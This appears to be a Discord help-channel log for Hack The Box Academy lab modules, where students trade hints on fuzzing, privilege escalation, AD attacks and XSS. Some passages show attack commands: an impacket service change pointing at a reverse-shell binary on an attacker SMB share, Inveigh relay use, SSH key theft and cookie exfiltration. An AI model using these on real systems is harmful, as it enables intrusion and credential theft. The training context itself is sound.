#modules
Oh, that's the callback IP - forgot about that. Alright, trying again.
Check your ipconfig to be sure
Hey im trying to solve bypassing encoded references section from web attacks module in this try to download contracts of employees to get the flag when i capture the request i get a url encoded base64 value
I am trying to fuzz to 1 to 20 by doing the same convert to base64 then to encodeurl
I dont seem to be getting the flag
Make sure you use the right request method :)
i am running it as admin.
Is the HTB host not open to installing PSGallery modules?
I tried post changed from get
Your request should mimic the request you intercepted
.m
Not much more I can say about it tbh
https://academy.hackthebox.com/module/54/section/483
for this section i do same with the command from this module but when i got the flag why i got wrong flag?
Yeah, the problem was that I was making the mistake of putting the DC01 IP in as the listener IP - need to get out of that habit.
Refrain from posting things that may contain flags for other sections
ok
Don't limit the recursion depth
but i already got the flag
@fathom pendant I went back and tried again on the web fuzzing skill assessment and got it finally haha, thank you for your guidance.
why i cannot use it to answer the question?
Because the one you showed isn't the answer
or you have some space before the answer or is not the answer
Don't forget to fuzz for extension
That wasn't the issue
so i just remove the recursion depth?
The answer he got was for the previous section
to remove the limit
You don't have to, from what I'm seeing
so the issue is not that is not the answer?
Yes
The screenshot he showed was the answer for the previous section
So. Not the right answer
recursion-depth 1 is this true?
You can keep it or not
It won't make much of a difference
I didn't from what I recall
No thankyou got it im an idiot i didnt see that obvious mistake i was making
so i just need to wait until the fuzzing done?
one big question
One small answer
about hackthebox
If only there was some sort of #welcome channel
It's ok, most people can't read
You think I'm joking
But there's plenty of people that pop in and ask for something blatantly illegal
i have 0 knowledge about computer programming
Programming knowledge isn't required tbh
wait fr
HTB academy is a good start
LESGOOOOO
what about languages
Most things that deal with code basically tell you what to do
oh
Bash,php,js are the big ones
https://academy.hackthebox.com/login All tier 0 modules are free, they will introduce you to cybersecurity quite well
where do i start if im into cybersecurity
And the thing with the snake.
It has often saved my life
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
SORRY I DIDNT MEAN TO TYPE THAT
I'm working on creating some python scripts to start/stop/reset/terminate targets it's actually very simple, the endpoint solely uses the section number
i've heard python is easy
Yeah, Python is really cool
yea it is really easy and simple
Got one that allows me to change vpn region, just need to update it with my session cookie and xsrf token
Well... no.
coding?
Programming == coding
oh
khan academy
basically i'm really interested in cyber security so i just needed some basic info
The beginners Bible linked earlier is a good start my guy
thanks guys
girl*
The academy has an information Security Foundations path
im trolling so bad
no im jk
chill it was jok
can anyone help me with this:
is this the nibbles initial foothold walkthrough module, this command is supposed to give me a reverse shell after executing this
ive also tried pwd as id and it still doesnt work
It's bc it's not calling to the right place
It needs to call to your ip/listener
not my target?
Think of nc as a phone dialer
When you open a call, is there an acceptance to call or not?
Who's on the Windows fundamentals module?
Just ask your question:)
Im doing the module and stuck on the 3rd question...
Metasploit has a few modules on it if you search sudo
You gotta be willing to search for answers
Not just run to the discord to do your research for you
Do you know a good one?
1.8.31
I have sessions for target
hey everyone
needed some help with the Post-Exploitation Persistence part in Attacking Enterprise Networks
Hey boys
The module itself is the guide
I made a diss track on tryhackme
i am trying to do it blind
Damn it got removed
Well blind includes not asking others for help
But im in the off topic chat
No... you're not
Oh wait
a slight help
You're right, my bad
lol thanks
I can't access the off topic
.
oh nvm i figured it out
Are any of you students registered on academy?
Well I can't access any other channels
I mean you can say that. But I'm telling you how to access other channels
If you can't read, that's not my problem
No you're not telling me how to do anything, you're directing me to the welcome channel that has instructions
Yes
Listen im not trying to be rude
Which tells you how to verify, and access other channels
Sorry that I'm not copy/pasting the instructions here your highness, didn't realize I had to cater to you
Pass-the-Ticket section of the Password Attacks module is taking 10 minutes and counting to spawn the target.
US-West-5 which has "Low Load" attached to it, so I'm not sure if it's the VPN connection that's the problem.
The vpn servers don't have a location tied to them
Pwnbox does
But the vpn servers are (US|EU)-academy-{1..6}
Well the PwnBox I'm connected to is 25ms which is better than all the others. Switching to US-6 to see if that makes a difference.
Nope. Still says spawning and it's now been 15 minutes
Pwnbox region and vpn region are separate
Aware of that. But again, still doesn't do anything to solve the hang at "Targets are spawning"
Change vpn regions, you'll likely need to restart the pwnbox
Update: finally spawned after nearly 20 minutes
Hey, question regarding
Module: Kerberos Attacks-Unconstrained Delegation - Users
"callum.dixon:C@lluMDIXON has Unconstrained Delegation set and carole.rose:jasmine has genericwrite over callum.dixon. Using this information, try to compromise the domain and read the content of C:\flag.txt on DC01."
Can anyone provide some info regarding that ?
@fathom pendant Is there another way for me to exploit Sudo?
The using metasploit module yes? All answers are in metasploit
But no session was created
Did you try all the available exploits?
I sent you a private picture
I didn't consent to dm :))
Come on just once please pro ❤️
Alternatively just reset the target and try again
I don't make exceptions
@keen jolt is a scammer don't trust him
Okay, as you want
take it to a mod/admin
How do I do that bro
see on the side (if on desktop) the people under Administrator/Moderator --> go to them
Did you see the picture?
I'm still in root password
I didn't understand how to get a root password
you don't need a root password
Lab It requires
??
the section you're working on does not require a sudo password
lmao
literally just spun up a target and performed the necessary steps
no pw required
Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.
OH
I thought you were doing the metasploit module
not the password attacks module
:)
:)))
see what happens when you don't communicate what module and section you're on?
Information Gathering - Web Edition skills assessment question 3 for the API key, I've found the h1dd3n admin directory, but the page won't load and all of my recons that I tried just give an error, anything i'm missing?
you need to use another person's login to find information; one of the tools in the module is useful
add a / to the end?
or don't
Sorry
:) in this case Sudo Might not be vulnerable for the password attacks module
I entered shh and metasploit
sometimes for whatever reason in browsers it tries to auto-upgrade and drop the port
but you can usually get it with curl
How
with curl i get moved permanently
-L to follow redirects
nevermind it is the / that made the difference!
yeah
thank you!
it's a bit of a tricky bitch imo
all those hours searching just for a / ;D
Find
you have will's credentials, first ssh in
this is basic linux dude
find doesn't display history
it just finds files on the system
Yes
ah ok
since you apparently don't know how to frame your question:
you're on the passwd, shadow, & opasswd section
in which case my hint here is actually... just look in will's home
The problem is that I want to open the shadow file, I can't
dude
Nothing
did you list ALL
:)
just doing ls or ls -l doesn't show hidden files or directories
ah now i remember... we were literally guiding you to this like yesterday
and told you to ignore sudo and /etc/
don't focus on that
the questions in this module are generally giving you the end goal
What should I do?
adm
when you ssh in
do not cd anywhere
just look directly where you are
you need to list all files in home
Kira / sam / will
Nothing
trust me there's something
it might be hidden
but there's something
and if you don't know how to list hidden files in linux at this point i really can't help you
Ok
Ok thanks bro
I found the solution
good now you have the next step forward
you have a lot of patience
i worked helldesk
:)))) the amount of stupid there pales in comparison
at least he knows how to type things
:)
Somewhere along the way I lost a great deal of my ability to not exhibit frustration with support issues.
Oh no
This man needs OTW stat
Does anyone else sometimes forget the previous module yea I have my notes and stuff but I still forget like small configs
Guys, I was hacked, can anyone help me please?
If it concerns any account, please contact the support of the respective provider
It is the typical excuse when they want to access a restricted account without permission+
okay I feel like i'm crazy but, what?
is that not the same exact payload it just said failed? (the payload does work)
It happens
looking at the logs it looks like the one that failed had ) as a prefix and the successful one had none; but why doesn't it test for no prefix before saying it failed??
fair enough, honestly
...
I don't think this is the right server for that question
oh sorry, I just googled minecraft cheats and this server came up :c
Do you know of any servers that are dedicated to Minecraft hacks?
I don't, sorry
and i'd be careful where you ask around about cheating
if you wanna learn cybersecurity you can stick around though /hj
1 that's illegal 2 read #rules 3 cringe if you need hacks to win
im doing the aen and im lost on how to run the ttimmons part it keeps failing and i am admin
this fails
did you load powerview module ?
Please refrain from spoiling the module
Consider any aspect that has to be discovered a spoiler, including passwords
While yes the module is a guide itself, most people do it blind meaning they don't even look at the module at all
No questions or outside help
The errors generally provide you with enough information to identify the issue and troubleshoot.
Well I'm assuming you're providing a password, and you ensured the right password was on the clipboard
If you're really hitting a wall and need help to move forward, just read the module up to where you're stuck
i am but i have done it to the t
Otherwise potentially reset the lab environment and see if maybe something wasn't loaded properly
As stated AEN itself is the walkthrough
So if you're struggling following it either your lab is bugged or you're doing something wrong
#Module: ADCS Attacks
#Section: ESC3
#Subsection: ESC3 Abuse Requirements
Not having any issues yet. Just trying to understand the "schema" version of certificate templates. In the subsection condition 2, it refers to an "Application Policy Issuance Requirement" for the target template. But I'm not finding much information that elaborates. How exactly would we verify if a template meets this requirement via server manager or LDAP without simply checking the schema version number? I hope this makes sense.
can certipy/certify do it? certify template /show?
it might be something like certify find /showallpermissions
iirc certify.exe find
will mention that
yeah that's for listing the templates
I'm working on the skills assessment for web fuzzing. One of the questions is to discover the full page URL for a website that says "You don't have access!"
I am positive I have the URL but can't get the answer. It keeps telling me I'm wrong. Anyone else run into this issue?
yea its the same thing after resetting the target
i just looked, certify find sees the schema version
plus you can just use /vulnerable and it'll find it for you
replace the port with PORT
Tried that too. Also tried without the port
make sure you have no spaces
Checked and no spaces lol
can you dm me what you're entering?
(is this allowed? i've completed the module)
Literally use the word PORT
Instead of the port number
🤦‍♂️
:)))))))

Thank you that worked lol
If you want you can DM and I'll look at what you got.
damn I need to be more clear
Nah tbh that's a bit of a tricky thing to convey
also would this be? it does feel iffy since I could lie about that
I don't think it's an issue since it is just a learning module not a new box with no write-ups
there's still a rule about not spoiling modules though
Hmm I'm not sure then. I'd hope it's fine since I'm just trying to confirm the formatting of the answer?
It's a bit of a trust thing
Dms are kinda Grey area as you don't know if the person has/hasn't passed it
It's mostly public where it's frowned upon
all depends on what staff is active, some allow it/do it themselves and some say you can't do it at all
which totally clears it up
believe it or not, straight to jail
;-;
In general. The best practice is to obfuscate as much as possible while still conveying your question
I.e. the A* user, or password p*
Or in some cases password A1..H8
With the first and last 2 characters
Other ways is if you obtained a file; md5sum
what section? need more info.
try adding the ip (without the port) to your hosts file and run the scan with the domain name
Can anyone help me with introduction to metasploit
Im on the payload section
I used this exploit(multi/http/apache_druid_cve_2023_25194)
index.php isn't the endpoint. Utilize all fuzzing techniques to discover the right file you'd pass parameters to
Web fuzzing skill assessment, it doesn't give a base domain to start with
ah okay.
In this case the right endpoint will explicitly tell you what the parameter is it wants you to fuzz when you visit it
Just need a sanity check
Literally every stop along the way in this assessment tells you where next
Genuinely don't recall the exploit used, but I believe the module is older than 2023
Aight cause search "apache_druid"
Don't use underscores, if that was the only one that popped up
Consider each bit a keyword
Aight2
There is an older expected exploit to use
You have to always bear in mind that module information regarding msfconsole may change due to new exploits being discovered since the module came out
Cause msf says its vulnerable
Yeah but the expected exploit to use is older
Yours is marked 2023
Also just bc it says it's vulnerable doesn't necessarily mean it is
Thx
so you gotta find the domain first?
For the web fuzzing skill assessment? No
The first step is finding the right endpoint to give up the domain
The assessment tests you on practically everything taught in the module
From extension fuzzing to subdomain fuzzing and recursion
Each successful step along the way will give you breadcrumbs to the next
How am i so bad at this
Extension fuzzing is your friend
You're in the right directory
I pwned axlle with almost no help but i cant even use msf 🥲
search apache druid
Yeah i got it
One of the results should be r..
Thx btw
got it, thanks for the help
Because it has nothing to do with any skill so to speak
Just usage of a tool
At this point whenever you curl or visit any pages you find you will be given a breadcrumb to the next fuzzing objective
so i found a vhost, but im getting this : Unable to validate base domain: (not exposing the vhost) (lookup vhost on 1.1.1.1:53: no such host)
Did you add it to your /etc/hosts file?
And did you look at it via http://domain:port/
http://domain:port/ add like this to the /etc/hosts?
No
Only the ip and domain (vhost you found) go in the hosts file
Protocol and ports don't go in the hosts file, as the hosts file is just a local dns
Hello, I been spawning a target on HTB Academy for like over 5 mins now and it still not finish, is there a way to fix this?
after like 5 hours just finished it, thanks for your tips :))
Change vpn regions
Pray
Np I'm glad the breadcrumbs lead you to victory
The target question not the pwnbox
I know what I said
Vpn region != pwnbox region
Hello guys - https://academy.hackthebox.com/module/147/section/1335
I tried few CVEs per linpeas but nothing is working. Just want to try cracking id_rsa from the same user. But the permission to view is not available - -rw------- need help on transferring to my host. Tried few file transfer methods, its throwing permission denied as expected.
thank you
Don't need any cves, just a lesson in history
Also you don't need to crack anything either
Also that permission set you showed shows that the owner of the file can read
but there is no bashrc_history for Dennis user
Also fun fact, the owner of a file on standard Linux installs always has full control of a file
Well bashrc_history isn't a thing
ohh okay...
Also there's a command simply called "history" you can use
I change the VPN server to US Academy 1 and it still show target(s) are spawning
Refresh page after switching regions then try spawning again
I refresh page and it show that, no button to spawn
After refresh page it show
Fetching status -> Target(s) are spawning
Reach out to support then ig
¯\_(ツ)_/¯
Green bubble on the bottom right of academy
Having the same problem. Seems to occur at night on the east coast. Only see targets are spawning and it sits there spinning. Tried changing vpn, relogging in - no good
Mine coming back after quite sometime
I think there are several of us having the same problem, we have to wait for support to help us
I don't understand it. they are creating ssh key and adding it to the auths list. but its for the same user which I already have the password to ssh into. What's there for root user from dennis history? (sorry for sounding dumb).
Look closely at history
I'm in as root
Oh sorry I might have been looking at the wrong module somehow
no problem, thank you
I swear the link you shared opened somewhere else lmao
Anyway
I was thinking of the ez one not the med one
Deleting spoilerish info
ohh my bad
On the Web Attack Module, Advance File Disclosure section. It showing two attack method the CDATA and the error base. I somehow get error base to work but the CDATA not work
Consider any info you have to find a spoiler
Not all techniques are possible
Ohh, I thought it can do both
This module is very much not everything you see is what you get
Also as a note, save the different dtds they have you make under different names
it's just a file full of all the dumb aliases i've added and later removed
It's usually .bash_history is more what I meant
Hi
yo
On forum I saw some people say they can make it work with CDATA, so trying to figure it out but still not working
Im on meterpreter section
And im stuck to find a working exploit for the machine
Its sayad existing exploit but ms17-010 didnt work
I got it work now, need some modification to the payload T..T
Hi guys can someone give me free cubes or gift card for def sec analyst 🥹 I Wanna learn in advance .
I'm an HS student
You can sign up with a student email. Nobody here is going to give you stuff like this
Edu email
Our school don't have that .. my school is poor
*says
Contact support, maybe they can work something out
or sub platinum plan for a month or 2 u can unlock alot of module with the cube from that plan
i'm dead stuck on sqlmap essentials - skills assessment. I genuinely can't find a single parameter to be vulnerable, i've tried crawling and fuzzing in case i'm missing anything but nothing seems to have any functionality that would interact with a database; even search functions and forms seem to just dry reload the page on client side without doing anything
Try to find a working parameter and tune your attack
Also try to understand what kind of attack technique possibly going to be so you can reduce the time you going to spend on waiting
I'm not rich either.. I'm currently working freelance and part time .. that money I can't afford yet 🤧...
Can you guys give me a roadmap to path I wanted to take.. I want to learn def sec and offsec in depth but there is no free platform online ...
save your money at least 20-30$ a month you can get the platinum plan in 2-3 months after saving which going unlock a bunch of module from tier 0 to tier 2
you can grind back some cube after complete module too... also tier 0 is free
Edited: You can earn back the amount of cube you spend to unlock tier 0 after completing tier 0
Yeap can I make more cubes by grinding tier 0 or is there a limit you can save?
Tier 0 cost you like 10 cube as I remember and you earn back 10 cubes. So you can learn all module in tier 0
for higher tier you gotta buy cube
My suggestion is save money from now and learn module in Tier 0, after you got some money for the platinum plan then go for higher
Owww 🥹
You don't go positive doing modules
Net neutral/negative
I dont want to learn everything that's outside the path I wanted tho
Yeap I see as well
Learn basic and foundation first
Aight thanks guys
Psexec should work
I already know server auditing and net security however what I'm lacking is penetration and exploitation since the best defense is to know the offense..
try to find a working parameter
I can't for the life of me do that is the problem, I can't find a single actually used parameter on the whole site
You may need to dig around for it, it's not immediately apparent
I know how to use tools but I don't want to be script kiddie all my life .. guess the only way is to save up
I checked every page I could find, had sqlmap crawl, and even did an ffuf scan for directories in case I had missed any
Open the network tab in devtools and click around until you find a post
There many techniques like BEUSTQ, try to figure out which one is it, gonna be some help too
That tech isn't covered by the module :)
Everything for the skill exam is covered by the module
Including the techniques
I did it with the tech that time it save lot of time
It will be a bit of trial/error
I always recommend for the skill exams to stick with what's taught
Aight noted
Only dig deeper if what's taught isn't working
just went through everything I can find again, have checked with both devtools and burp, no posts to be found
Did you try placing an order or adding to cart?
yep and yep
:))
this gonna give a post request, check it with your burp
And you checked in the network tab yeah?
yep, that and burp
How didn't u find it then?
I think something might be broken on my end cause neither of those even send requests at all
they just soft refresh the page
When you click add to cart do you get a popup saying "item added"?
Are u getting an alert?
nope
Try it for every item
nothing still, it just jumps me to the top of the page
But the "add to cart" button should send the request
Is burp capturing anything?
nope, nothing in burp and nothing in network
If not then ur not clicking the wrong thing
The literal button that says add to cart, none of the other buttons afaik
I did it a few hours ago
intercept the traffic forward it 1 by 1
No other buttons go through the server I'm pretty sure
same deal
that's my 3rd lab reset also
what am I looking for with that?
The cart button shouldn't take you to index.html afaik
Yeah try looking for a script in the html and it will probably show you which button it's listening for.
I can get to cart.html through the cart button in the top right, which I assume isn't what you mean (and doesn't send any post(neither does the checkout button from there))
but yea, when I hover over the add to cart button it says it's to index.html#
All items?
they shouldn't
yea, all of them do
it should be a dom call to shop.html# since its the button that executes the script
yeah spawned a fresh one and it's working as intended
okay there we go
I restarted it again and now the ones on shop.html are working; any add to cart on index.html is still broken though
those aren't broken
those ones are working as intended
the only buttons that work are on the shop page
:))
mmkay
the idea is that you're exploring a shop page for a vulnerability, and sometimes that vulnerability isn't readily apparent on the index page
you should always try all pages you can
I did try to check everything on every page, I think I just got thrown off since those two look like they should have identical functionality
good to keep in mind though, always assume the devs made it weird
yep
inspecting the elements of both pages you'll see the add on one page triggers an event, while it doesn't on the other page
alternatively consider the devs messed up when initially making the site :)
honestly I should've already been there given every experience i've ever had trying to develop with someone else
lmao
and tyyy
I just wanna say you're really awesome for helping out in here so much

Hey..I am just a beginner in cybersecurity and want to learn linux how should I start
?or if anyone can help me with the roadmap or something...it would be helpful for me!
Yeah i used ms17 010 psexec still noting
if you want to learn the basics of linux there's a "Linux Fundamentals" module
Did you set the user and password (as given just above the question?)
There is?!
No its the footage question
Autocorrect sorry
Can anyone help with NTLM Relay Attacks - Skills Assessment for BACKUP01? I think I'm using the right vector but I keep getting -] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type). Been stuck on this for several days now, running out of ideas. Have taken a look in the shares and found nothing interesting, nothing writable... Tried RCBD but unable to perform the attack... ntpdate does not fix this issue. Any ideas?
Thanks ...I will check it out
Yeah, its the first question
Hey when I try to lab on instance it's not working properly
Need help with Windows Lateral Movement - SMB Section - 2nd question (the service ALG).
I have encountered the error attempting to get reverse shell :
```
impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 start -name ALG
[*] Starting service ALG
[-] SCMR SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
```
while, my reverse shell is located in the SMB share and the user Lich is successfully authenticated by SMB.
```
impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 config -name ALG
[*] Querying service config for ALG
TYPE : 16 - SERVICE_WIN32_OWN_PROCESS
START_TYPE : 3 - DEMAND START
ERROR_CONTROL : 0 - IGNORE
BINARY_PATH_NAME : \10.10.14.167\share\rshell-8080.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Application Layer Gateway Service
DEPENDENCIES : /
SERVICE_START_NAME: INLANEFREIGHT\Lich
```
ll rshell-8080.exe -rwxrwxrwx 1 root root 48K Aug 30 01:06 rshell-8080.exe
Please, tell me what's wrong?
DM with to help you find a workaround
Does anyone know how or where i can find solo leveling arias hacks/cheats?
I am new here
Whatttt
no
wrong server
also that's illegal
Do you have any suggestions for discord servers providing cheats for games because i am totally new to discord stuff
I don't, but my suggestion would probably be to either get gud or go play a game you can actually enjoy without cheating
This isn't the server for that
I suggest reading #welcome
Please don't include anything you had to Fuzz for in your question
But the Web Fuzzing skill assessment tests you on everything you were taught in that module
when the author mentions to unzip the alpine image, will any alpine image do ? Or it has to be a custom one from some github ? I have done this before on machines and it was usually some github alpine image, but the author gives no detail in this regard
i really have no idea where they are getting this alpine.zip from
Hey yall, im currently doing the skill assessment for the information gathering-web edition module and im like hard stuck at a part which i think is a technical issue..? basically (spoiler for module) ||i found the web1337 vhost and read into the robots.txt where i found the admin dir, however whenever i try to access it it just seems down? like im unable to connect or perform any kind of thing with the subdomain so i cant get any info out of it. I cant use no tools as they wont connect either so im just not sure how to proceed from here||
You should delete this spoiler
And DM me
guys i know that is not the channel most appropriate, but what do you think about develop and implement a SIEM system in CTFs attack and defense?
which error do you have?
for both the tools and the browser, it just says that it cannot establish a connection. im not sure if there is another way to obtain the API key in the admin dir without enumeration, but i cant seem to enumerate anythin without establishing a connection 
is your vpn up?
with a low ping
vpn is up i can access the main domain
ok, have you add the subdomain in your host file?
yep
ok, so you are stuck on third flag, right?
mhm
ill restart my router or somethin man, because spoilers ||curling the domain didnt work, yes i made sure it wasnt https. the domain is in the hosts file||
im out of options at this point :p
i'm trying it, i'm respawning the target
ah ok perfect
really weird though but things happen
Hello, I'm kind of stuck with the Web Attack Skill assessment, I gather the user but now I dont know where to go next
Hey guys I Need help
we need the problem to give you help
Yea sorry So I am currently doing Ad Enumeration And Exploiting Module I am in credential Harvesting Part Of Linux and stuck in question 2 here it goes
The Number Cannot be made in decimal but still I tried every output I could Think Off
Also Tried giving in hex and everything
have you tried with cmdlet Get-ADGroupMember?
Hey.... Perhaps some contributor or staff can point me out to the direction here.
I think there is some kind of malformation in the Cheat Sheet Generation script for the Blind SQL Injection Module.
It generates the content way too small compared to the other modules and unformatted.
the user forend is part of this group?
Yes Local Admin
maybe can be the others member at exclusion of your user, so 9
Didnt worked
No! That's the answer
But its not working
Try removing any message that would give a direct answer in this channel
Does it have any space while inputting?
Oh Okay I didnt know about that rule sorry
No
Its a 10 I have tried 10.0, 0.10 And 0x10 also
Yes Didnt worked
Mine is green here with that value
Thanks a lot man that one space wasted a lot of time
And thier hint even confused me more
How would ya'll differentiate between Discovery, Footprinting, and Enumeration?
Discovery As very basic Footprinting as little bit more like using nmap to scan for open ports and enumeration like gathering user information or finding flaws when we are in network. NOT Sure But I Think Soo
hi guys
im stuck in this question in the joomla attack section in the ATTACKING COMMON APPLICATION Module This is the question ( Leverage the directory traversal vulnerability to find a flag in the web root of the http://dev.inlanefreight.local/ Joomla application ) and i used the script to list the directory but i cant read the content of them so i cant read the flag
I need help if possible
have you tried going there in your browser
but the question asks you explicitly the content of the flag? because this flag file has a strange name so it can be the flag
if it is please remove the spoiler
open the file in your browser, you already know the file name
the name is also a spoiler btw, pls remove it
i will try it
I'm not sure, I don't know where to find it
you have the directory and the file name, search them in browser
you tried to read the flag?
you did the webshell right ?
don't forget to replace spaces with +
you also need to have the correct path to your file to request it from the server URL/goodpath/file?param=cmd+.../
yes but for the path traversal it must first be the webshell (which it modifies in the protostar templates)
personally this is how I found the flag
i'm confused
Are you at the joomla attack section?
yes
wow it did work Thanks
and thanks everyone for the help
I followed the course: I went into the template protostar, I added my webshell in the page error.php, then I saved it
and then I did this :
ah ok you have followed another way
FootPrinting module, medium lab Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer. i got the || alex and sa (system administrator) with credential as well but following the hint its probably the mssql id,pass. tried, did not work. || any hint would be fine.
no i just followed the course lol
@fathom pendant could you help with this
what is the link ?
no, alex is not a cred for mssql, it's a credential for another protocol
Guys can anyone help me
you can connect to alex with several windows protocols
i guess ||rdp||
yes
Just ask your question here.
But first, read #rules
the credentials from ||important.txt|| are not working in ||rdp||
Try an important user
Perhaps a powerful one you'll find in all Windows installs
If you can't ask here the assumption will be that it's illegal
Oh okay, sorry
That's not a windows account name
Maybe when you sign into the system check c:\users
okay, let me try
Heya, i'm newbie here
Somehow I can't change my nickname to ascii letters on this server
Just read and follow #welcome to link your htb account
Thanks!
I was saying that alex was useful for the rdp and not the credentials in the important file.
??? The important file is still important
You can use those creds
yesss I didn't say otherwise ahaha but not for rdp
Yes for rdp
Maybe not the username but the pw
Module: Attacking Common Applications
Section: WordPress - Discovery & Enumeration
Link to section: https://academy.hackthebox.com/module/113/section/1100
Find the version number of this plugin. (i.e., 4.5.2)
Been on this question a while, so I thought I'd ask. I've solved the prior questions. I've read the hint but hasn't really helped. This is what I've tried:
- I've tried reading the source code of where this plugin is mentioned.
- I've tried wpscan.
- Since directory listing is enabled, I tried checking the directory (
/wp-content/plugins/<plugin-name>/) and there's no listing.
aah wait maybe I'm talking nonsense here
Are you looking at blog.inlanefreight.local?
Yes
And since you're on q3, you've answered q2
Did you see if there's a readme.txt there?
In the directory for the plugin they're referring to?
When I tried navigating to the directory, there's no listings of files.
Like anywhere on the site?
No.
In that directory
As in did you try just throwing it on there
And just seeing
i had found the cred on alex and then i had been able to launch the application thanks to that i had not used the creds in important.txt for the rdp
As most plug-ins and such come with a readme
Yes... you can rdp with alex
I did not... I see.
I see. Thanks.
Has anyone here completed the 'Exploiting XSS via WebSockets' in the 'Modern Web Exploitation Techniques' module on HTB Academy? I received a hint: 'The admin uses a firewall that prevents you from exfiltrating the cookie directly.' I've tried other JavaScript commands like alert or document.documentURI, which work normally, but document.cookie seems to be blocked. I've tried jsf*ck, adding timing to the command, URL encoding, unicode escape sequences, ... but none of them worked.
You can also rdp with the other user
okay
I'll try again always good to know
document.cookie is not blocked, you'll just need to find a way to use xss to send it. read the source code provided to find which function you can use
Hmm i've tried /userws and /adminws but don't work
@grand portal if you want to test the theory out yourself go spin it up and see
you'll need to find the right payload
again read the source code provided to find which function you can use
im finished testing my theories, i || i used rdp to open windows, now can't get the mssql server credentials working||
I mean if you use the right account. It will work
is there any other account other than ||alex, sa ?||
C:\users
A glaringly obvious account
this tip slipped through my mind. let me check
i tried that obvious account, with the creds i found importantly, still not working,
Did you try with just the password?
Not the first part
username:password
yes i know, : separates them, i carefully used them, by default when i open ssms, it was automatically set at that username, i tried that as well
Did you rdp with other user
Otherwise you need to run as
i did rdp with alex user
wait
i got a theory, let me try
ftp doesn't even exist on the IP address
i even put the ftp port in as normal
"attacking common services" is the module
Terminate then start the target again
I tried that as well
The question here implies ftp is running on a non-standard port btw
so port 21?
Try removing the min-rate and see
yeah sure
Port 21 is standard
chance it skipped the port with min-rate
As said, the question implies not standard
got it
rescanning right now
I really need a linux server nmap takes so long my wifi sucks
Try also using -sT instead of -sS
thank you
but in the real world isn't -sS less detectable because it doesn't rly establish a full tcp connection?
Sometimes that can appear more suspicious
Not to mention you're already still sending the ICMP ping anyway
that is true
hi
i did rdp as other user using important creds. still not able to login in ssms
Just use windows login
it worked- why is that?
Because that's how it's set up
hi
the same creds used for rdp, is being used with windows login. right?
Hello, for the question "Introduction to Web Applications - HTML Injection ", what is the attended slogan ? I tried Your Cyber Performance Center but it is wrong. Any idea ?
i'm new here and i want to follow the bug hunter roadmap. where should i start?
i know this topics already:
1- Python
2- Go
3- linux essential
hello, I am new in the community!
not able to find user 'htb'
try ssh username@target_ip
e.g., ssh htb-student@10.129.254.254
Try re-phrase and put your question properly.
I'm not able to login using mssqlclient.py, i thought i'd use query to find out user. To same server. in the gui version, we used the same credential, any suggestion?
Can you give me some hint? I've searched thoroughly in the source code but still haven't found it
there's a socket function in the code
combine it with standard xss payload
document.documentURI worked, but document.cookie doesn't work :(
Looking for some help installing any distro using WSL.
- I've successfully installed and verified I have WSL2 as default.
- I've successfully downloaded Ubuntu 24.04 LTS from the Windows Store.
- When I try to install I keep getting the following error in PowerShell:
WslRegisterDistribution failed with error: 0x80370109 Error: 0x80370109 The operation timed out because a response was not received from the virtual machine or container.
I've tried searching online for solutions but not having any luck. Thanks!
Dammm, it worked but I still don't understand why?? lmao
Thank you so much!!!
Could you help me with the medium lab of footprinting?
.\Inveigh-Relay.ps1
PS C:\Users\Administrator\desktop> Invoke-InveighRelay -Target (ip)
Invoke-InveighRelay : The term 'Invoke-InveighRelay' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.
any idea why i cant get Inveigh-Relay.ps1 to work ?
alright i got the flag.
I wasn't importing the module, bloody hell
Because mssql is only running internally
not sure who wrote the active directory module, but really enjoying this one. good job
https://academy.hackthebox.com/module/87/section/885
do i need to setup a separate windows enviro it seems the info provided on how to do so is outdated?
confused because it states win/10 but windows is saying its win/11
setup should be the same as Windows 10
marcilee the nmap scan took 4 hours i just fell asleep and woke up and it was still going lmfao
Is it required to setup a separate windows environment or i can use a lying around device
it is good practice to use a virtual machine for any pentesting activity
So do i download the Dev VM they link me?
but i prefer a VM
makes everything easier 4 me
yep. choose the VM image based on the hypervisor you're using
im using VMware workstation so i assume VMware?
yes
it's not really a hard requirement to set up a Windows VM, but it's helpful to have in some cases
It shouldn't take that long
my head hurts from reading the windows module rn
Sometimes windows gets mad when you compile things on non-windows machines
even when i want to compile something on windows, microsoft just doesn't let me (visual studio 2017)
yeah i know
Also 4h, the target died
yeah i saw it die when i woke up
im a just continue once i finish something up
How can meterpreter reside "...entirely in the memory of the remote host and leaves no traces on the hard drive." and yet also be persistent across reboots?
can anyone help me with: https://academy.hackthebox.com/module/77/section/844, 2nd question
anyone knows why **cupp** will not generate permutations for some strings that I specify ?
SSH Keys
Finally, let us discuss SSH keys. If we have read **access over the .ssh directory** for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and use it to log in to the server. If we can read the /root/.ssh/ directory and can read the id_rsa file, we can copy it to our machine and use the -i flag to log in with it:
Xoriath@htb[/htb]$ vim id_rsa
Xoriath@htb[/htb]$ chmod 600 id_rsa
Xoriath@htb[/htb]$ ssh root@10.10.10.10 -i id_rsa
Need more info. Since you're user 2 did you check and see what user2 might have access to, that that normally shouldn't?
This feels like a copy/paste rather than actual help tbh
Yes, is the info provided by the lesson that can help
Also nice alt xoriath
what ?
Rather lead a horse to water than show them the direct answer
Considering the copy/paste from that account has your username in the @[/htb]$
:)
ah lol, wtf how come the copy paste of that guy has my name ?
not able to find that, it asks for user2 passwd which I don't have
just changed it lel
Don't need sudo my guy
sudo -l?
Nope
then?
My statement referred to viewing files, not sudo actions
anyway, just in case you might know, I am trying to generate password permutations with cupp and this string securesolacoders, but it's not generating any permutations with it. Is it because it's too long and cupp is too limited ?
how do we do that?
How else do you view files in linux?
:)
Especially if you're listing them
ohh okay
Also be sure to look for hidden files and directories
Especially in sensitive places like /root/
yeah in /root/ there's a file flag.txt
This boils down to basic file permissions in linux
There's more in there
